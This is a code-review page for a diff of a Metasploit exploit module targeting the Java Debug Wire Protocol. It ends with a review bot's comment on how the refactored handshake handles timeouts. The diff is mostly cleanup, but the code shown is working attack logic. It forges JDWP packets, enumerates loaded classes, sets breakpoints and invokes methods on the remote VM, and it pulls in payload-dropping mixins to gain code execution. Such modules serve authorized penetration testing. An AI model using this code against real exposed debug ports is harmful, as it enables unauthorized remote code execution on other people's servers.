Fix suggestions
parent
60c5307475
commit
6061e5e713
|
@ -6,11 +6,9 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::CheckCode
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
|
@ -127,9 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
vprint_status("#{peer} - Checking for Java Debugging Wire Protocol")
|
||||
|
||||
sock.put(HANDSHAKE)
|
||||
|
||||
res = sock.get(datastore['RESPONSE_TIMEOUT'])
|
||||
res = handshake
|
||||
|
||||
disconnect
|
||||
|
||||
|
@ -145,17 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
def peer
|
||||
return "#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
# Establishes handshake with the server
|
||||
def handshake
|
||||
vprint_status("#{peer} - Sending the handshake...")
|
||||
|
||||
sock.put(HANDSHAKE)
|
||||
|
||||
res = sock.get(datastore['RESPONSE_TIMEOUT'])
|
||||
return sock.get(datastore['RESPONSE_TIMEOUT'])
|
||||
|
||||
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless res
|
||||
|
||||
return res == HANDSHAKE
|
||||
end
|
||||
|
||||
# Forges packet for JDWP protocol
|
||||
|
@ -166,13 +161,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
pktlen = data.length + 11
|
||||
|
||||
buf = [pktlen, @myid, flags, cmdset, cmd]
|
||||
buf = [pktlen, @my_id, flags, cmdset, cmd]
|
||||
|
||||
pkt = buf.pack("NNCCC")
|
||||
|
||||
pkt << data
|
||||
|
||||
@myid += 2
|
||||
@my_id += 2
|
||||
|
||||
return pkt
|
||||
end
|
||||
|
@ -279,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
data = {}
|
||||
|
||||
formats.each { |fmt,name|
|
||||
formats.each do |fmt,name|
|
||||
if fmt == "L" or fmt == 8
|
||||
data[name] = buf.unpack('Q>')[0]
|
||||
buf.slice!(0..7)
|
||||
|
@ -305,7 +300,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
|
||||
end
|
||||
|
||||
}
|
||||
end
|
||||
entries.append(data)
|
||||
end
|
||||
|
||||
|
@ -329,11 +324,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
entries = parse_entries(response, formats, false)
|
||||
|
||||
entries.each { |entry|
|
||||
entry.each{ |name,value|
|
||||
@vars[name] = value
|
||||
}
|
||||
}
|
||||
entries.each { |e| @vars.merge!(e) }
|
||||
|
||||
end
|
||||
|
||||
|
@ -355,11 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
entries = parse_entries(response, formats, false)
|
||||
|
||||
entries.each { |entry|
|
||||
entry.each{ |name,value|
|
||||
@vars[name] = value
|
||||
}
|
||||
}
|
||||
entries.each { |e| @vars.merge!(e) }
|
||||
|
||||
end
|
||||
|
||||
|
@ -370,7 +357,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
# Returns reference types for all classes currently loaded by the target VM
|
||||
def all_classes
|
||||
def get_all_classes
|
||||
|
||||
return unless @classes.empty?
|
||||
|
||||
|
@ -394,13 +381,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Checks if specified class is currently loaded by the target VM and returns it
|
||||
def get_class_by_name(name)
|
||||
|
||||
@classes.each { |entry_array|
|
||||
@classes.each do |entry_array|
|
||||
|
||||
entry_array.each { |entry|
|
||||
entry_array.each do |entry|
|
||||
|
||||
return entry if entry["signature"].downcase == name.downcase
|
||||
}
|
||||
}
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
@ -434,13 +421,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Checks if specified method is currently loaded by the target VM and returns it
|
||||
def get_method_by_name(classname, name, signature = nil)
|
||||
|
||||
@methods[classname].each { |entry|
|
||||
@methods[classname].each do |entry|
|
||||
if signature.nil?
|
||||
return entry if entry["name"].downcase == name.downcase
|
||||
else
|
||||
return entry if (entry["name"].downcase == name.downcase) && (entry["signature"].downcase == signature.downcase)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
@ -498,12 +485,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data << [SUSPEND_ALL].pack('C')
|
||||
data << [args.length].pack('N')
|
||||
|
||||
args.each { |kind,option|
|
||||
args.each do |kind,option|
|
||||
|
||||
data << [kind].pack('C')
|
||||
data << option
|
||||
|
||||
}
|
||||
end
|
||||
|
||||
sock.put(create_packet(EVENTSET_SIG, data))
|
||||
|
||||
|
@ -528,7 +515,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Parses a received event and compares it with the expected
|
||||
def parse_event_breakpoint(buf, event_id)
|
||||
|
||||
num = buf[2..5].unpack('N')[0]
|
||||
r_id = buf[6..9].unpack('N')[0]
|
||||
|
||||
return nil unless event_id == r_id
|
||||
|
@ -562,12 +548,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data << format(@vars["methodid_size"], meth_id)
|
||||
data << [args.length].pack('N')
|
||||
|
||||
args.each { |arg|
|
||||
args.each do |arg|
|
||||
|
||||
data << arg
|
||||
data << [0].pack('N')
|
||||
|
||||
}
|
||||
end
|
||||
|
||||
sock.put(create_packet(INVOKESTATICMETHOD_SIG, data))
|
||||
|
||||
|
@ -591,12 +577,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
data << [args.length].pack('N')
|
||||
|
||||
args.each { |arg|
|
||||
args.each do |arg|
|
||||
|
||||
data << arg
|
||||
data << [0].pack('N')
|
||||
|
||||
}
|
||||
end
|
||||
|
||||
sock.put(create_packet(INVOKEMETHOD_SIG, data))
|
||||
|
||||
|
@ -615,12 +601,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data << format(@vars["methodid_size"], meth_id)
|
||||
data << [args.length].pack('N')
|
||||
|
||||
args.each { |arg|
|
||||
args.each do |arg|
|
||||
|
||||
data << arg
|
||||
data << [0].pack('N')
|
||||
|
||||
}
|
||||
end
|
||||
|
||||
sock.put(create_packet(CREATENEWINSTANCE_SIG, data))
|
||||
|
||||
|
@ -846,7 +832,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
break_class = get_class_by_name(classname)
|
||||
|
||||
fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, possible is not used by application") unless break_class
|
||||
fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, probably is not used by the application") unless break_class
|
||||
|
||||
get_methods(break_class["reftype_id"])
|
||||
|
||||
|
@ -906,18 +892,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
@myid = 0x01
|
||||
@my_id = 0x01
|
||||
@vars = {}
|
||||
@classes = []
|
||||
@methods = {}
|
||||
@os = nil
|
||||
|
||||
|
||||
check
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - Doesn't seem to be vulnerable") if check == Exploit::CheckCode::Safe
|
||||
|
||||
# To avoid connection refused due to previously opened connection during check
|
||||
Rex::sleep(1)
|
||||
|
||||
connect
|
||||
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake == HANDSHAKE
|
||||
|
||||
# 1. Get the sizes of variably-sized data types in the target VM
|
||||
idsizes
|
||||
|
@ -926,7 +915,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
get_version
|
||||
|
||||
# 3. Get all currently loaded classes by the target VM
|
||||
all_classes
|
||||
get_all_classes
|
||||
|
||||
# 4. Sets a breakpoint on frequently called method (user-defined)
|
||||
r_id = set_breakpoint
|
||||
|
@ -942,7 +931,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...")
|
||||
|
||||
buf = wait_for_event()
|
||||
buf = wait_for_event
|
||||
|
||||
ret = parse_event_breakpoint(buf, r_id)
|
||||
|
||||
|
|
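Review bot: `handshake` now returns whatever `sock.get(datastore['RESPONSE_TIMEOUT'])` yields instead of a boolean, and the `fail_with(Failure::TimeoutExpired, ...) unless res` guard appears to be on the removed side, so a reply that never arrives would reach the callers as `nil` while the comment above the method says nothing about it. In `exploit` that case is now reported as `Failure::UnexpectedReply`, which hides the difference between a port that stayed silent and a service that answered with something other than the JDWP handshake. `check` assigns `res = handshake`, but the code that interprets `res` lies outside the hunk, so the nil case needs confirming there too. I would extend the comment to `# Sends the JDWP handshake and returns the raw reply, or nil if nothing arrives within RESPONSE_TIMEOUT`, and in `exploit` use `res = handshake` followed by `fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless res` before comparing with `HANDSHAKE`. The +/- markers are lost on this page, so which line of each printed pair is the new one is inferred from the order in which the pairs are printed.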